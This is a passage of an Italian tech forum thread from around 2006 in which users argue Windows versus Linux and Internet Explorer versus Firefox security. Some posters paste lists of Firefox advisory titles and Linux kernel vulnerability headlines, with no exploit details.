            ben chiaro, parlo per me.Bell'esempio di coerenza: mi accusi di "FALSITA' E MENZOGNA" e poi dici che parli solo "per te"...Non ho mica detto che non c'è software, ho solo detto che molto software manca, e spesso, purtroppo non esistono alternative o applicazioni in grado di gestire formati compatibili.A me non frega niente che il sw sia open source o closed source: a me serve un determinato software e prendo quello che di meglio esiste... se l'alternativa open esiste ed è migliore, ben venga, ma purtroppo non sempre c'è.Per quello che faccio io spesso sono "costretto" ad usare Windows perché NON ESISTONO ALTERNATIVE.bye
          • Anonimo scrive:
            Re: VAUTA I FATTI !!!!!
            - Scritto da: Anonimo

            - Scritto da: Anonimo



            bisogna riconoscere che a livello di GUI
            Linux ha


            molto copiato tanto da Win quanto da Mac, e



            forse il contrario :)

            ma proprio per niente... il solo fatto che su
            Linux la GUI è arrivata "dopo", e che scimmiotta
            palesemente la GUI di Windows, con tanto di barra
            inveriore e simil-menù-start, è un esempio più
            che lampante.
            BWHAHAHA, che cabarettista!Io mi ricordo che ai tempi dei 486 i miei amici sulla stessa macchina usavano il DOS (MSDOS) e invece con Lino usavano l'FVWM...
          • Trollfighter scrive:
            Re: VAUTA I FATTI !!!!!
            - Scritto da: Anonimo

            Linux non è un'azienda,

            ma la RedHat si (giusto per citarne una), così
            come tutte le aziende che forniscono
            consulenza... perché OK che Linux è meglio, ma se
            non lo sai configurare a modo può lasciare aperte
            porte più grosse dei bug di UinDOSQuindi non puo essere parificata a M$ perchè quest'ultima offre molto di più di una consulenza.

            Linux non produce hardware,

            neanche MS in senso strettoGiusto per citarne una... XboX ti dice niente? Si dai, la stessa macchina che i linari deturpano in continuazione con accrocchi operativi.

            Linux non produce innovazione,

            beh... qui avrei qualcosa da ridire...E cosa di grazie? Ma se siete fermi al palo da qualche annetto ormai...

            Linux non è afflitto dai problemi di Windows

            perchè non hai mai avuto il coraggio di proporsi

            come seria alternativa al prodotto commerciale,

            Linux non è un prodotto commerciale, e non può
            proporsi come tale.Infatti io non ho detto questo, leggi meglio.

            Linux vive di riflesso, alle spalle di M$ e dei

            produttori di hardware,

            seee... non esageriamo... Linux vivrebbe
            benissimo anche se non esistesse MS, anche se
            bisogna riconoscere che a livello di GUI Linux ha
            molto copiato tanto da Win quanto da Mac, e
            purtroppo molto sw per Linux non esiste (non è un
            caso l'utilizzo di wine)No, siamo onesti... Hai detto la pura verità ma ti contraddici anche. Linux ha tirato su dai concorrenti, gli utenti non lo vogliono ammettere come per quel che riguarda il discorso sulle montagne di bug (tra l'altro la maggior parte proprio sui DoS!) che affliggono questo sistema operativo.

            Linux è tutto questo è tanto altro, ma di sicuro

            non è una cosa seria.

            Sarebbe bello se ci spieghi la tua concezione di
            serietàTe l'ho detto, l'unico modo di dimostrare che linux è un sistema serio è di mettersi in competizione con Windows e dimostrare realmente di essere migliore, cosa che non lo è oggi e non lo sarà manco domani, fino al giorno in cui ci si accorgerà che forse è meglio accantonare il discorso dell'open source, troppo dispersivo e inconcludente.
            PS: non so né pro né contro Linux... mi piace
            sapere che esistono alternativeLe alternative ci sono, ma sono in mano a persone sbagliate. Questa è la mia opinione.
            ciaoCiao.
          • Anonimo scrive:
            Re: VAUTA I FATTI !!!!!
            posso sapere la tua idea di software? come vedi il mercato del software nei prossimi decenni?"L'open source è dispersivo e inconcludente" puoi argomentarmi questa frase?"Linux non crea innovazione" anche questa per favoreChe intendi per innovazione? Che avrebbe fatto di innovativo Microsoft? Sopratutto che avrebbe creato microsoft?Xbox è stata creata da Microsoft? in quale delle dimesioni parallele? Xbox non ha un componente microsoft che sia 1. l'unico componente hardware microsoft sulla xbox è il bollinoFabrizio
          • Anonimo scrive:
            Re: VAUTA I FATTI !!!!!



            Linux non produce innovazione,



            beh... qui avrei qualcosa da ridire...

            E cosa di grazie? Ma se siete fermi al palo da
            qualche annetto ormai...Come stiamo a filesystem? NTFS è sempre quella solita schifezza?Hai presente Ext3 e soprattutto ReiserFS? ;)
          • Anonimo scrive:
            Re: VAUTA I FATTI !!!!!
            - Scritto da: Trollfighter


            Le alternative ci sono, ma sono in mano a persone
            sbagliate. Questa è la mia opinione.
            Non lo sai usare e se hai provato ad installarlo hai fallito miseramente, di conseguenza Linux fa schifo.Il bello e' che al posto di Linux, nella frase sopra posso mettere qualunque sistema operativo.. Mac OSX, AmigaOS,QNX,GEM... quello che vuoi, ma se non riesci ad usarlo in 5 minuti, per te fa schifo.Sai quanti ne conosco ridotti in questo stato? un botto.Spero tu non sia un informatico di mestiere, saresti solo un fallimento completo.Saluti da un utente Windows XP(ex Windows 3.11, ex Windows 98, ex Windows 2000) e Linux (Fedora), che si e' fatto le ossa con il basic sul C=64.
    • Anonimo scrive:
      Re: VAUTA I FATTI !!!!!
      In che senso i FATTI?I FATTI, nel senso di quelli che vedono sicurezza, serenità, stabilità, e tante altre cose che vedono solo loro?Io sono due giorni che gli chiedo di cosa si fanno, per poter valutare meglio, ma non mi rispondono.Come faccio a valutare i FATTI se non mi si danno elementi per una valutazione seria e approfondita?FATTI... fatevi avanti e diteci di cosa vi fate!!!
  • Anonimo scrive:
    [OT] VISTA : dovremo riscriverne il 60%
    LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!60% Of Windows Vista Code To Be RewrittenDavid Richards - Friday, 24 March 2006 Up to 60% of the code in the new consumer version of Microsoft new Vista operating system is set to be rewritten as the Company "scrambles" to fix internal problems a Microsoft insider has confirmed to SHN.http://www.smarthouse.com.au/Computing/Platforms?Article=/Computing/Platforms/R7G5G6U4
    • Anonimo scrive:
      Re: [OT] VISTA : dovremo riscriverne il
      - Scritto da: Anonimo

      LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!

      60% Of Windows Vista Code To Be RewrittenNon è una buona notizia ne per windows XP ne per vista. Riscrivere il 60% del codice significa che:1) nei precedenti windows il codice fa schifo2) avremmo un Vista bello nuovo, ma potenzialmente buggato.
      • Anonimo scrive:
        XP dovrebbero scontartelo del 60%?
        - Scritto da: Anonimo

        - Scritto da: Anonimo



        LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!



        60% Of Windows Vista Code To Be Rewritten

        Non è una buona notizia ne per windows XP ne per
        vista. Riscrivere il 60% del codice significa
        che:
        1) nei precedenti windows il codice fa schifo
        2) avremmo un Vista bello nuovo, ma
        potenzialmente buggato.Quindi XP dovrebbero scontartelo del 60% per 'vizi' del prodotto?
      • Anonimo scrive:
        Re: [OT] VISTA : dovremo riscriverne il
        - Scritto da: Anonimo

        - Scritto da: Anonimo



        LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!



        60% Of Windows Vista Code To Be Rewritten

        Non è una buona notizia ne per windows XP ne per
        vista. Riscrivere il 60% del codice significa
        che:
        1) nei precedenti windows il codice fa schifo
        2) avremmo un Vista bello nuovo, ma
        potenzialmente buggato.oppure potresti prima leggere la news suddetta
    • Anonimo scrive:
      Re: [OT] VISTA : dovremo riscriverne il
      - Scritto da: Anonimo

      LA VERITA' SUL RINVIO AL 2007 DI VISTA EMERGE!!!

      60% Of Windows Vista Code To Be RewrittenLa notizia è falsa.UPDATE: This story has been proven to be false. More on this from the Scobleizerhttp://scobleizer.wordpress.com/2006/03/24/where-the-heck-is-scoble/
  • Anonimo scrive:
    Al solito.. l'inganno
    Fanno programmi colabrodo .. non a caso.L'obbiettivo è semplicissimo."ci spiace IE 6 è un colabrodo però potete passare a IE7 presto che è molto più sicuro".A lungo andare anche IE7 risulterà non più sicuro e sarà necessario di IE8.Ma veniamo al problema vero..Per installare IE7 ci vuole XP SP2.Per installare IE8 quando uscirà ci vorrà Vista.E così continuando vi COSTRINGERANNO per essere SICURI e navigare COME SI DEVE ad aggiornare sistema operativo e ovviamente id conseguenza il pc.Pagareeeeeeeee
    • Anonimo scrive:
      Re: Al solito.. l'inganno
      ti quoto anche citando msn messenger.msn messenger 7? 2k/xp!msn messenger 7.5? solo xp!curioso però che sono riusciti, modificando qualcosa, a farlo andare su 2k...oh! vuoi dirmi che era totalmente compatibile con 2k, ma han deciso di non farlo andare apposta?mi son rotto con sta mania del "ti obbligo ad aggiornare a sp2/xp/vista/altro.." se vuoi continuare a usare questo programma aggiornato...un colpettino di qua (msn 7.5), un colpettino di la (ie 7)...magari msn 8 chiederà sp2...
      • Anonimo scrive:
        Re: Al solito.. l'inganno
        - Scritto da: Anonimo
        ti quoto anche citando msn messenger.

        msn messenger 7? 2k/xp!
        msn messenger 7.5? solo xp!

        curioso però che sono riusciti, modificando
        qualcosa, a farlo andare su 2k...oh! vuoi dirmi
        che era totalmente compatibile con 2k, ma han
        deciso di non farlo andare apposta?
        Chiaro che sia così..Era totalmente compatibile, solo che hanno fatto qualche check stupido per obbligare la gente.


        mi son rotto con sta mania del "ti obbligo ad
        aggiornare a sp2/xp/vista/altro.." se vuoi
        continuare a usare questo programma aggiornato...
        fai come me.. impara a usare Linux o pensa a passare a Mac.
        un colpettino di qua (msn 7.5), un colpettino di
        la (ie 7)...magari msn 8 chiederà sp2...msn8 magari chiederà vista? :Pforse no.. magari l'8.5 si :P
      • Trollfighter scrive:
        Re: Al solito.. l'inganno
        - Scritto da: Anonimo
        un colpettino di qua (msn 7.5), un colpettino di
        la (ie 7)...magari msn 8 chiederà sp2...Aggiornamenti necessari, indispensabili che denotano serietà e alta professionalità degli ingegneri al servizio di M$. Windows non è mica in scatola di montaggio da montare e smontare a piacimento in cantina come fanno i linari con il loro linusux....Mwhahahahah!
        • Anonimo scrive:
          Re: Al solito.. l'inganno
          - Scritto da: Trollfighter

          - Scritto da: Anonimo


          un colpettino di qua (msn 7.5), un colpettino di

          la (ie 7)...magari msn 8 chiederà sp2...

          Aggiornamenti necessari, indispensabili che
          denotano serietà e alta professionalità degli
          ingegneri al servizio di M$.
          Windows non è mica
          in scatola di montaggio da montare e smontare a
          piacimento in cantina come fanno i linari con il
          loro linusux....
          Mwhahahahah!quelli che ti costringono di fatto a cambiare PC.Si che professionalità..PAGARE
    • Anonimo scrive:
      Re: Al solito.. l'inganno
      - Scritto da: Anonimo
      Fanno programmi colabrodo .. non a caso.
      L'obbiettivo è semplicissimo.
      "ci spiace IE 6 è un colabrodo però potete
      passare a IE7 presto che è molto più sicuro".
      A lungo andare anche IE7 risulterà non più sicuro
      e sarà necessario di IE8.
      Ma veniamo al problema vero..
      Per installare IE7 ci vuole XP SP2.
      Per installare IE8 quando uscirà ci vorrà Vista.
      E così continuando vi COSTRINGERANNO per essere
      SICURI e navigare COME SI DEVE ad aggiornare
      sistema operativo e ovviamente id conseguenza il
      pc.
      Pagareeeeeeeeeche ragionamento del menga... se non vuoi passare al prossimo IE/windows usa le alternative.
      • Anonimo scrive:
        Re: Al solito.. l'inganno

        che ragionamento del menga... se non vuoi passare
        al prossimo IE/windows usa le alternative.infatti uso Gnu/Linux
        • Anonimo scrive:
          Re: Al solito.. l'inganno
          - Scritto da: Anonimo


          che ragionamento del menga... se non vuoi
          passare

          al prossimo IE/windows usa le alternative.

          infatti uso Gnu/Linux
          E allora perchè vuoi pagare. Mah.
    • Anonimo scrive:
      5 --
  • TrollSpammer scrive:
    AH AH AH EXPLODERBUG
    e io dovrei cambiare firefox per exploder???si certo come no!!
    • Anonimo scrive:
      Re: AH AH AH EXPLODERBUG
      - Scritto da: TrollSpammer
      e io dovrei cambiare firefox per exploder???
      si certo come no!!stai certo che di falle ci sono anche per il tuo amico firefox. La differenza sta nel fatto che non le sbandierano ai quattro venti ma puntualmente ad ogni versione i buffer overflow e l'esecuzione di codice c'è sempre:Fixed in Firefox 1.5.0.1MFSA 2006-08 "AnyName" entrainment and access control hazardMFSA 2006-07 Read beyond buffer while parsing XMLMFSA 2006-06 Integer overflows in E4X, SVG and CanvasMFSA 2006-05 Localstore.rdf XML injection through XULDocument.persist()MFSA 2006-04 Memory corruption via QueryInterface on Location, Navigator objectsMFSA 2006-03 Long document title causes startup denial of ServiceMFSA 2006-02 Changing postion:relative to static corrupts memoryMFSA 2006-01 JavaScript garbage-collection hazardsFixed in Firefox 1.0.7MFSA 2005-59 Command-line handling on Linux allows shell executionMFSA 2005-58 Firefox 1.0.7 / Mozilla Suite 1.7.12 Vulnerability FixesMFSA 2005-57 IDN heap overrun using soft-hyphensFixed in Firefox 1.0.5/1.0.6MFSA 2005-56 Code execution through shared function objectsMFSA 2005-55 XHTML node spoofingMFSA 2005-54 Javascript prompt origin spoofingMFSA 2005-53 Standalone applications can run arbitrary code through the browserMFSA 2005-52 Same origin violation: frame calling top.focus()MFSA 2005-51 The return of frame-injection spoofingMFSA 2005-50 Exploitable crash in InstallVersion.compareTo()MFSA 2005-49 Script injection from Firefox sidebar panel using data:MFSA 2005-48 Same-origin violation with InstallTrigger callbackMFSA 2005-47 Code execution via "Set as Wallpaper"MFSA 2005-46 XBL scripts ran even when Javascript disabledMFSA 2005-45 Content-generated event vulnerabilitiesFixed in Firefox 1.0.4MFSA 2005-44 Privilege escalation via non-DOM property overridesMFSA 2005-43 "Wrapped" javascript: urls bypass security checksMFSA 2005-42 Code execution via javascript: IconURLFixed in Firefox 1.0.3MFSA 2005-33 Javascript "lambda" replace exposes memory contentsMFSA 2005-34 javascript: PLUGINSPAGE code executionMFSA 2005-35 Showing blocked javascript: popup uses wrong privilege contextMFSA 2005-36 Cross-site scripting through global scope pollutionMFSA 2005-37 Code execution through javascript: faviconsMFSA 2005-38 Search plugin cross-site scriptingMFSA 2005-39 Arbitrary code execution from Firefox sidebar panel IIMFSA 2005-40 Missing Install object instance checksMFSA 2005-41 Privilege escalation via DOM property overridesFixed in Firefox 1.0.2MFSA 2005-32 Drag and drop loading of privileged XULMFSA 2005-31 Arbitrary code execution from Firefox sidebar panelMFSA 2005-30 GIF heap overflow parsing Netscape extension 2Fixed in Firefox 1.0.1MFSA 2005-29 Internationalized Domain Name (IDN) homograph spoofingMFSA 2005-28 Unsafe /tmp/plugtmp directory exploitable to erase user's filesMFSA 2005-27 Plugins can be used to load privileged contentMFSA 2005-26 Cross-site scripting by dropping javascript: link on tabMFSA 2005-25 Image drag and drop executable spoofingMFSA 2005-24 HTTP auth prompt tab spoofingMFSA 2005-23 Download dialog source spoofingMFSA 2005-22 Download dialog spoofing using Content-Disposition headerMFSA 2005-21 Overwrite arbitrary files downloading .lnk twiceMFSA 2005-20 XSLT can include stylesheets from arbitrary hostsMFSA 2005-19 Autocomplete data leakMFSA 2005-18 Memory overwrite in string libraryMFSA 2005-17 Install source spoofing with user:pass@hostMFSA 2005-16 Spoofing download and security dialogs with overlapping windowsMFSA 2005-15 Heap overflow possible in UTF8 to Unicode conversionMFSA 2005-14 SSL "secure site" indicator spoofingMFSA 2005-13 Window Injection SpoofingFixed in Firefox 1.0MFSA 2005-12 javascript: Livefeed bookmarks can steal private dataMFSA 2005-09 Browser responds to proxy auth request from non-proxy ssl serverMFSA 2005-08 Synthetic middle-click event can steal clipboard contentsMFSA 2005-07 Script-generated event can download content without promptingMFSA 2005-05 Input stealing from other tabsMFSA 2005-04 Secure site lock can be spoofed using view-source:MFSA 2005-03 Secure site lock can be spoofed by a binary downloadMFSA 2005-02 Opened attachments are temporarily saved world-readableMFSA 2005-01 Link opened in new tab can load local file
      • Anonimo scrive:
        Re: AH AH AH EXPLODERBUG
        - Scritto da: Anonimo

        - Scritto da: TrollSpammer

        e io dovrei cambiare firefox per exploder???

        si certo come no!!

        stai certo che di falle ci sono anche per il tuo
        amico firefox. La differenza sta nel fatto che
        non le sbandierano ai quattro venti ma
        puntualmente ad ogni versione i buffer overflow e
        l'esecuzione di codice c'è sempre:

        Fixed in Firefox 1.5.0.1
        MFSA 2006-08 "AnyName" entrainment and access
        control hazard
        MFSA 2006-07 Read beyond buffer while parsing XML
        MFSA 2006-06 Integer overflows in E4X, SVG and
        Canvas
        MFSA 2006-05 Localstore.rdf XML injection through
        XULDocument.persist()
        MFSA 2006-04 Memory corruption via QueryInterface
        on Location, Navigator objects
        MFSA 2006-03 Long document title causes startup
        denial of Service
        MFSA 2006-02 Changing postion:relative to static
        corrupts memory
        MFSA 2006-01 JavaScript garbage-collection hazards

        Fixed in Firefox 1.0.7
        MFSA 2005-59 Command-line handling on Linux
        allows shell execution
        MFSA 2005-58 Firefox 1.0.7 / Mozilla Suite 1.7.12
        Vulnerability Fixes
        MFSA 2005-57 IDN heap overrun using soft-hyphens

        Fixed in Firefox 1.0.5/1.0.6
        MFSA 2005-56 Code execution through shared
        function objects
        MFSA 2005-55 XHTML node spoofing
        MFSA 2005-54 Javascript prompt origin spoofing
        MFSA 2005-53 Standalone applications can run
        arbitrary code through the browser
        MFSA 2005-52 Same origin violation: frame calling
        top.focus()
        MFSA 2005-51 The return of frame-injection
        spoofing
        MFSA 2005-50 Exploitable crash in
        InstallVersion.compareTo()
        MFSA 2005-49 Script injection from Firefox
        sidebar panel using data:
        MFSA 2005-48 Same-origin violation with
        InstallTrigger callback
        MFSA 2005-47 Code execution via "Set as Wallpaper"
        MFSA 2005-46 XBL scripts ran even when Javascript
        disabled
        MFSA 2005-45 Content-generated event
        vulnerabilities

        Fixed in Firefox 1.0.4
        MFSA 2005-44 Privilege escalation via non-DOM
        property overrides
        MFSA 2005-43 "Wrapped" javascript: urls bypass
        security checks
        MFSA 2005-42 Code execution via javascript:
        IconURL

        Fixed in Firefox 1.0.3
        MFSA 2005-33 Javascript "lambda" replace exposes
        memory contents
        MFSA 2005-34 javascript: PLUGINSPAGE code
        execution
        MFSA 2005-35 Showing blocked javascript: popup
        uses wrong privilege context
        MFSA 2005-36 Cross-site scripting through global
        scope pollution
        MFSA 2005-37 Code execution through javascript:
        favicons
        MFSA 2005-38 Search plugin cross-site scripting
        MFSA 2005-39 Arbitrary code execution from
        Firefox sidebar panel II
        MFSA 2005-40 Missing Install object instance
        checks
        MFSA 2005-41 Privilege escalation via DOM
        property overrides

        Fixed in Firefox 1.0.2
        MFSA 2005-32 Drag and drop loading of privileged
        XUL
        MFSA 2005-31 Arbitrary code execution from
        Firefox sidebar panel
        MFSA 2005-30 GIF heap overflow parsing Netscape
        extension 2

        Fixed in Firefox 1.0.1
        MFSA 2005-29 Internationalized Domain Name (IDN)
        homograph spoofing
        MFSA 2005-28 Unsafe /tmp/plugtmp directory
        exploitable to erase user's files
        MFSA 2005-27 Plugins can be used to load
        privileged content
        MFSA 2005-26 Cross-site scripting by dropping
        javascript: link on tab
        MFSA 2005-25 Image drag and drop executable
        spoofing
        MFSA 2005-24 HTTP auth prompt tab spoofing
        MFSA 2005-23 Download dialog source spoofing
        MFSA 2005-22 Download dialog spoofing using
        Content-Disposition header
        MFSA 2005-21 Overwrite arbitrary files
        downloading .lnk twice
        MFSA 2005-20 XSLT can include stylesheets from
        arbitrary hosts
        MFSA 2005-19 Autocomplete data leak
        MFSA 2005-18 Memory overwrite in string library
        MFSA 2005-17 Install source spoofing with
        user:pass@host
        MFSA 2005-16 Spoofing download and security
        dialogs with overlapping windows
        MFSA 2005-15 Heap overflow possible in UTF8 to
        Unicode conversion
        MFSA 2005-14 SSL "secure site" indicator spoofing
        MFSA 2005-13 Window Injection Spoofing

        Fixed in Firefox 1.0
        MFSA 2005-12 javascript: Livefeed bookmarks can
        steal private data
        MFSA 2005-09 Browser responds to proxy auth
        request from non-proxy ssl server
        MFSA 2005-08 Synthetic middle-click event can
        steal clipboard contents
        MFSA 2005-07 Script-generated event can download
        content without prompting
        MFSA 2005-05 Input stealing from other tabs
        MFSA 2005-04 Secure site lock can be spoofed
        using view-source:
        MFSA 2005-03 Secure site lock can be spoofed by a
        binary download
        MFSA 2005-02 Opened attachments are temporarily
        saved world-readable
        MFSA 2005-01 Link opened in new tab can load
        local file
        Finalmente uno che gliela canta giusta!!!!!!!!!!
        • Anonimo scrive:
          Re: AH AH AH EXPLODERBUG
          - Scritto da: Anonimo

          - Scritto da: Anonimo



          - Scritto da: TrollSpammer


          e io dovrei cambiare firefox per exploder???


          si certo come no!!



          stai certo che di falle ci sono anche per il tuo

          amico firefox. La differenza sta nel fatto che

          non le sbandierano ai quattro venti ma

          puntualmente ad ogni versione i buffer overflow
          e

          l'esecuzione di codice c'è sempre:



          Fixed in Firefox 1.5.0.1

          MFSA 2006-08 "AnyName" entrainment and [cut]

          Fixed in Firefox 1.0.7

          MFSA 2005-59 Command-line handling on Linux[cut]

          Fixed in Firefox 1.0.5/1.0.6

          MFSA 2005-56 Code execution through shared[cut]

          Fixed in Firefox 1.0.4

          MFSA 2005-44 Privilege escalation via non-DOM[cut]

          Fixed in Firefox 1.0.3

          MFSA 2005-33 Javascript "lambda" replace [cut]

          Fixed in Firefox 1.0.1

          MFSA 2005-29 Internationalized Domain Name [cut]

          Fixed in Firefox 1.0

          MFSA 2005-12 javascript: Livefeed bookmarks can[cut]

          Finalmente uno che gliela canta giusta!!!!!!!!!!Do you know the italian translation of FIXED?
      • Anonimo scrive:
        Re: AH AH AH EXPLODERBUG
        A volte voi winari mi sorprendete. Vi ritenete superesperti e poi vi fregate cosi?Quelle sono vulnerabilita' CORRETTE ... NON CI SONO PIU'. Conta e riporta invece quelle presenti e NON correte e poi ne riparliamo ... confrontandole anche con quelle di IE.Saluti
  • krh scrive:
    Disattiva...
    Per avere IE sicuro:Disattivare ActiveXDisattivare Javascriptil prossimo ?Forse a sto punto se si restava con Mosaic ?
    • Anonimo scrive:
      Re: Disattiva...
      Qualcosa contro mosaic ???c'e' solo da portar rispetto a quel browser !!!!
    • QW scrive:
      Re: Disattiva...
      - Scritto da: krh
      Per avere IE sicuro:

      Disattivare ActiveX
      Disattivare Javascript

      il prossimo ?

      Forse a sto punto se si restava con Mosaic ?voglio proprio vedere chi disattiva il javascript... ormai è indispensabile.
      • Maiale scrive:
        Re: Disattiva...
        - Scritto da: QW

        - Scritto da: krh

        Per avere IE sicuro:



        Disattivare ActiveX

        Disattivare Javascript



        il prossimo ?



        Forse a sto punto se si restava con Mosaic ?

        voglio proprio vedere chi disattiva il
        javascript... ormai è indispensabile.Non è indispensabile, in moltissimi casi puoi tenere javascript disabilitato e abilitarli solo per certi siti in cui ti fidi e che serve avere attivo javascript.Esiste noscript per FF.Per IE credo proprio che te li devi abilitare a mano ogni volta
        • mda scrive:
          Re: Disattiva...
          - Scritto da: Maiale

          - Scritto da: QW



          - Scritto da: krh


          Per avere IE sicuro:





          Disattivare ActiveX


          Disattivare Javascript





          il prossimo ?





          Forse a sto punto se si restava con Mosaic ?



          voglio proprio vedere chi disattiva il

          javascript... ormai è indispensabile.

          Non è indispensabile, in moltissimi casi puoi
          tenere javascript disabilitato e abilitarli solo
          per certi siti in cui ti fidi e che serve avere
          attivo javascript.
          Esiste noscript per FF.
          Per IE credo proprio che te li devi abilitare a
          mano ogni voltaOddio solo l' 1% dei siti (disabilitando js) potrebbe funzionare:'( Ciao
          • Anonimo scrive:
            Re: Disattiva...
            - Scritto da: mda

            Oddio solo l' 1% dei siti (disabilitando js)
            potrebbe funzionare
            :'( Punto Informatico funziona benissimo senza js.I quotidiani online che consulto io funzionano benissimo senza jsyahoo mail funziona senza js (apre pagine diverse ma funziona).sourceforge funziona senza jslinux journal funziona senza jsgoogle funziona senza jswikipedia funziona senza jsPoi non so che uso tu faccia del web: io i siti di winari che cercano l'anima gemella, o i siti di loghi e suonerie che installano dialers non ne frequento.
    • Anonimo scrive:
      Re: Disattiva...
      - Scritto da: krh
      Disattivare ActiveX
      Disattivare Javascript

      il prossimo ?Disattivare Windows e passare ad un sistema operativo più serio.
      • Anonimo scrive:
        Re: Disattiva...

        Disattivare Windows e passare ad un sistema
        operativo più serio.si consiglia Linux o FreeBSD
      • Anonimo scrive:
        Re: Disattiva...
        - Scritto da: Anonimo
        Disattivare Windows e passare ad un sistema
        operativo più serio.quante vulnerabilità ci sono state per linux questo mese?Linux Kernel SDLA IOCTL Unauthorized Local Firmware Access Vulnerability2006-03-24http://www.securityfocus.com/bid/16304Linux Kernel DM-Crypt Local Information Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16301Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability2006-03-24http://www.securityfocus.com/bid/16141Linux Kernel ProcFS Kernel Memory Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16284Linux Kernel IP6_Input_Finish Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16043Linux Kernel Time_Out_Leases PrintK Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15627Linux Kernel ICMP_Push_Reply Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16044Linux Kernel handle_stop_signal Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16856Linux Kernel IPv6 FlowLable Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15729Linux Kernel PTraced Child Auto-Reap Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15625Linux Kernel PTrace CLONE_THREAD Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15642Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16135Linux Kernel mq_open System Call Unspecified Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16283Linux Kernel Console Keymap Local Command Injection Vulnerability2006-03-24http://www.securityfocus.com/bid/15122Linux Kernel Multiple Memory Leak Local Denial Of Service Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15076Linux Orinoco Driver Remote Information Disclosure Vulnerability2006-03-23http://www.securityfocus.com/bid/15085Linux Kernel USB Subsystem Local Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14955Linux Kernel Multiple Security Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15049Linux Kernel 64-Bit SMP Routing_ioctl() Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14902Linux Kernel IPV6 Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15156Linux Kernel SCSI ProcFS Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14790Linux Kernel Sysctl Unregistration Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15365Linux Kernel IPSec Policies Authorization Bypass Vulnerability2006-03-23http://www.securityfocus.com/bid/14609Linux Kernel ISO File System Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14614Linux Kernel Sendmsg() Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14785Linux Kernel Multiple Vulnerabilities2006-03-23http://www.securityfocus.com/bid/12598Linux Kernel Coda_Pioctl Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14967Linux Kernel USB io_edgeport Driver Local Integer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/12102Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities2006-03-23http://www.securityfocus.com/bid/17203Linux Kernel die_if_kernel Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/16993ecc. ecc.
        • Anonimo scrive:
          Re: Disattiva...
          E quante per Win?la limitazione a 7000 caratteri mi impedisce di farci stare tutta la tragedia.....
        • Anonimo scrive:
          Re: Disattiva...
          - Scritto da: Anonimo

          - Scritto da: Anonimo

          Disattivare Windows e passare ad un sistema

          operativo più serio.

          quante vulnerabilità ci sono state per linux
          questo mese?

          Linux Kernel SDLA IOCTL Unauthorized Local
          Firmware Access Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16304

          Linux Kernel DM-Crypt Local Information
          Disclosure Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16301

          Linux Kernel Sysctl_String Local Buffer Overflow
          Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16141

          Linux Kernel ProcFS Kernel Memory Disclosure
          Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16284

          Linux Kernel IP6_Input_Finish Remote Denial Of
          Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16043

          Linux Kernel Time_Out_Leases PrintK Local Denial
          of Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15627

          Linux Kernel ICMP_Push_Reply Remote Denial Of
          Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16044

          Linux Kernel handle_stop_signal Denial of Service
          Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16856

          Linux Kernel IPv6 FlowLable Denial Of Service
          Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15729

          Linux Kernel PTraced Child Auto-Reap Local Denial
          of Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15625

          Linux Kernel PTrace CLONE_THREAD Local Denial of
          Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15642

          Linux Kernel SET_MEMPOLICY Local Denial of
          Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16135

          Linux Kernel mq_open System Call Unspecified
          Denial of Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16283

          Linux Kernel Console Keymap Local Command
          Injection Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15122

          Linux Kernel Multiple Memory Leak Local Denial Of
          Service Vulnerabilities
          2006-03-23
          http://www.securityfocus.com/bid/15076

          Linux Orinoco Driver Remote Information
          Disclosure Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/15085

          Linux Kernel USB Subsystem Local Denial Of
          Service Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14955

          Linux Kernel Multiple Security Vulnerabilities
          2006-03-23
          http://www.securityfocus.com/bid/15049

          Linux Kernel 64-Bit SMP Routing_ioctl() Local
          Denial of Service Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14902

          Linux Kernel IPV6 Local Denial of Service
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/15156

